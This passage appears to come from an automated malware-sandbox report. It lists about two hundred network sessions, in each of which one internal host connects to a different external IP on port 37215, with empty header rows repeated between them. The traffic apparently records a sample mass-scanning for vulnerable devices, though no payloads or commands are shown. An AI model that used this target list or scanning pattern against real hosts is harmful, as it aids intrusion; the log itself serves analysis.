                                                  7828192.168.2.134967241.167.133.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7829192.168.2.134892041.26.223.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7830192.168.2.1354648197.86.147.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7831192.168.2.1333198204.123.50.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7832192.168.2.133418286.223.155.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7833192.168.2.1345454223.218.18.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7834192.168.2.1354910157.238.252.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7835192.168.2.134653441.104.26.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7836192.168.2.1353882197.36.136.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7837192.168.2.133924244.230.161.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7838192.168.2.1338336197.226.184.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7839192.168.2.133466247.195.171.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7840192.168.2.136039641.130.204.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7841192.168.2.135105261.104.243.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7842192.168.2.133948441.180.169.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7843192.168.2.1357348180.215.170.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7844192.168.2.135048041.226.222.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7845192.168.2.133779441.101.143.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7846192.168.2.1348034174.227.228.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7847192.168.2.1348568100.196.116.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7848192.168.2.136093441.13.123.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7849192.168.2.135130841.197.234.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7850192.168.2.135962041.189.89.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7851192.168.2.134033092.199.234.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7852192.168.2.1350168156.218.199.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7853192.168.2.1356312197.172.131.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7854192.168.2.135564441.210.246.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7855192.168.2.1336762157.30.36.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7856192.168.2.1343618157.121.86.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7857192.168.2.133674280.207.27.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7858192.168.2.1345528197.215.119.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7859192.168.2.1358708210.86.21.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7860192.168.2.133683482.210.96.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7861192.168.2.1337914197.241.211.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7862192.168.2.1359034197.245.36.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7863192.168.2.1349984157.171.140.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7864192.168.2.1358880197.23.57.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7865192.168.2.1345122189.111.181.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7866192.168.2.134008441.50.18.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7867192.168.2.1341250157.127.152.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7868192.168.2.1358816157.44.123.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7869192.168.2.1339208197.59.160.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7870192.168.2.1345092108.94.172.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7871192.168.2.135617241.214.55.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7872192.168.2.134904841.117.199.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7873192.168.2.1355388163.121.213.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7874192.168.2.1357838197.150.123.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7875192.168.2.1336610157.96.29.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7876192.168.2.134060041.70.32.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7877192.168.2.1341986197.44.223.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7878192.168.2.135129213.91.14.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7879192.168.2.1359188167.227.203.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7880192.168.2.135485641.250.15.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7881192.168.2.134008475.108.196.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7882192.168.2.1352976197.123.251.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7883192.168.2.1350844157.65.19.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7884192.168.2.1334790157.163.101.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7885192.168.2.135224441.174.252.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7886192.168.2.1346610157.83.248.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7887192.168.2.134095697.60.255.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7888192.168.2.133367441.197.150.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7889192.168.2.134013041.244.7.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7890192.168.2.1348296114.179.56.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7891192.168.2.1358588208.0.127.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7892192.168.2.1344086157.144.244.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7893192.168.2.135061241.128.22.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7894192.168.2.1352926213.70.67.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7895192.168.2.135498498.231.93.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7896192.168.2.1342116197.246.17.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7897192.168.2.1341014197.67.17.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7898192.168.2.1335514197.38.236.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7899192.168.2.1349876174.164.30.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7900192.168.2.134596241.66.221.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7901192.168.2.1347526133.205.208.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7902192.168.2.1355636157.234.83.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7903192.168.2.1335864197.99.7.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7904192.168.2.1351518123.52.0.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7905192.168.2.135669441.35.44.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7906192.168.2.135267841.52.86.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7907192.168.2.1355834218.74.167.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7908192.168.2.134113479.128.160.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7909192.168.2.1357190157.180.183.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7910192.168.2.1352478184.104.240.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7911192.168.2.1357576197.26.100.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7912192.168.2.1341958157.192.83.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7913192.168.2.1339094157.141.17.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7914192.168.2.135442441.108.67.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7915192.168.2.135002241.195.73.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7916192.168.2.1356284157.92.69.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7917192.168.2.1345418157.57.149.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7918192.168.2.1347812155.54.237.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7919192.168.2.135178041.79.150.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7920192.168.2.1334878197.252.179.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7921192.168.2.1334714197.12.159.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7922192.168.2.134638641.52.34.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7923192.168.2.134864841.140.129.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7924192.168.2.135286441.30.103.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7925192.168.2.135868641.60.102.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7926192.168.2.1351520197.6.220.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7927192.168.2.1346818157.217.67.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7928192.168.2.134809641.234.110.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7929192.168.2.1359710157.144.253.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7930192.168.2.1342644200.1.28.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7931192.168.2.1342250131.212.51.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7932192.168.2.1355734157.75.214.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7933192.168.2.1338678197.99.76.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7934192.168.2.1348574197.90.196.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7935192.168.2.1352202157.0.88.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7936192.168.2.1336276157.76.8.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7937192.168.2.1352066157.121.72.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7938192.168.2.1347730157.9.147.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7939192.168.2.1336748132.185.77.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7940192.168.2.1334418197.44.169.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7941192.168.2.1348174197.31.197.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7942192.168.2.1353278157.192.245.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7943192.168.2.1349782206.33.0.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7944192.168.2.133594841.159.91.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7945192.168.2.1349348197.139.45.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7946192.168.2.1333606197.45.144.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7947192.168.2.1343342197.102.5.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7948192.168.2.135143641.71.167.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7949192.168.2.1342204197.128.155.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7950192.168.2.1360234190.54.215.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7951192.168.2.135218866.239.62.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7952192.168.2.1336368157.178.56.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7953192.168.2.134319441.207.223.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7954192.168.2.133734272.210.129.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7955192.168.2.1344852197.111.50.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7956192.168.2.1333268157.185.239.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7957192.168.2.1352716197.159.198.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7958192.168.2.1337756157.87.213.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7959192.168.2.135358441.178.112.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7960192.168.2.1358844157.91.160.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7961192.168.2.1333262112.58.61.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7962192.168.2.1360272157.150.239.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7963192.168.2.133820841.12.180.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7964192.168.2.1338314219.100.194.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7965192.168.2.135666441.187.165.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7966192.168.2.1350728197.224.47.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7967192.168.2.1342850198.53.246.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7968192.168.2.1335078197.106.93.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7969192.168.2.1350248197.146.121.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7970192.168.2.1355938164.181.252.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7971192.168.2.134851845.122.133.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7972192.168.2.1356684157.98.207.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7973192.168.2.1358552144.94.115.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7974192.168.2.1352942197.164.60.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7975192.168.2.1354408156.237.141.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7976192.168.2.134661641.57.26.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7977192.168.2.134024041.9.233.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7978192.168.2.1349272157.77.206.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7979192.168.2.1360882157.15.107.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7980192.168.2.135872841.155.69.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7981192.168.2.1354354157.36.94.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7982192.168.2.1356726158.60.238.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7983192.168.2.1341886197.168.146.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7984192.168.2.1354918197.244.223.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7985192.168.2.1355540197.254.121.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7986192.168.2.134703841.137.185.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7987192.168.2.134045480.70.9.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7988192.168.2.133833441.6.5.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7989192.168.2.1359508157.193.160.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7990192.168.2.1358234197.138.43.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7991192.168.2.1338608157.99.185.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7992192.168.2.1333666197.117.206.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7993192.168.2.1346212197.155.253.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7994192.168.2.1359012173.122.112.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7995192.168.2.1336522181.49.194.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7996192.168.2.133923241.9.179.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7997192.168.2.134288041.235.128.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7998192.168.2.1334364197.69.48.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7999192.168.2.1354050148.212.216.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8000192.168.2.1351956157.166.43.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8001192.168.2.1355826157.236.142.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8002192.168.2.1351366201.128.191.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8003192.168.2.1347658197.54.236.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8004192.168.2.1355262197.37.14.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8005192.168.2.1334644197.214.119.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8006192.168.2.133624441.119.239.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8007192.168.2.133687453.201.48.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8008192.168.2.1339474197.113.2.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8009192.168.2.1355700197.75.4.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8010192.168.2.1340246197.4.199.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8011192.168.2.134854641.126.234.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8012192.168.2.1345048197.32.87.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8013192.168.2.1347968157.246.6.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8014192.168.2.133708441.42.179.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8015192.168.2.135115635.114.35.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8016192.168.2.133435441.68.61.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8017192.168.2.135489496.200.238.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8018192.168.2.1339816213.247.178.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8019192.168.2.133851041.247.0.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8020192.168.2.1336630157.54.209.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8021192.168.2.1337858197.180.248.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8022192.168.2.1349984221.7.41.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8023192.168.2.1334404197.163.236.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8024192.168.2.1338592157.51.37.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8025192.168.2.1333808157.231.12.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8026192.168.2.1344490106.128.61.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8027192.168.2.133698041.9.201.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8028192.168.2.134620841.19.93.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8029192.168.2.1332920157.35.130.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8030192.168.2.134923841.91.249.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8031192.168.2.1356240197.11.201.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8032192.168.2.136020441.59.113.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8033192.168.2.1339352157.39.101.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8034192.168.2.133723241.55.78.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8035192.168.2.1339862197.67.68.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8036192.168.2.1341112157.148.228.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8037192.168.2.134486841.221.228.12737215
